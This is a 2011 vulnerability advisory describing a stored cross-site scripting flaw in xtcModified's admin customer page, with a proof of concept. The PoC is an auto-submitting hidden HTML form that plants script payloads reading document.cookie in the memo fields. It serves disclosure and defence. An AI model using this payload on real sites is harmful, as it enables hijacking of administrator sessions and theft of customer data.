HTB22864: XSS vulnerability in xtcModified

Vulnerability ID: HTB22864
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_xtcmodified_1.html
Product: xtcModified
Vendor: xtcModified Team ( http://www.xtc-modified.org/ )
Vulnerable Version: 1.05 and probably prior versions
Vendor Notification: 17 February 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "admin/customers.php" script to properly sanitize user-supplied input in "memo_title" and "memo_text" variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/customers.php?cID=1&amp;action=update&quot; method="post" name="main">

<input type="hidden" name="default_address_id" value="1">
<input type="hidden" name="customers_gender" value="m">
<input type="hidden" name="csID" value="">
<input type="hidden" name="customers_firstname" value="FirstName">
<input type="hidden" name="customers_lastname" value="LName">
<input type="hidden" name="customers_dob" value="01/01/2007">
<input type="hidden" name="customers_email_address" value="[email protected]">
<input type="hidden" name="entry_company" value="company">
<input type="hidden" name="entry_password" value="mypass">
<input type="hidden" name="memo_title" value='mmtitle"><script>alert(document.cookie)</script>'>
<input type="hidden" name="memo_text" value='txt"><script>alert(document.cookie)</script>'>

</form>
<script>
document.main.submit();
</script>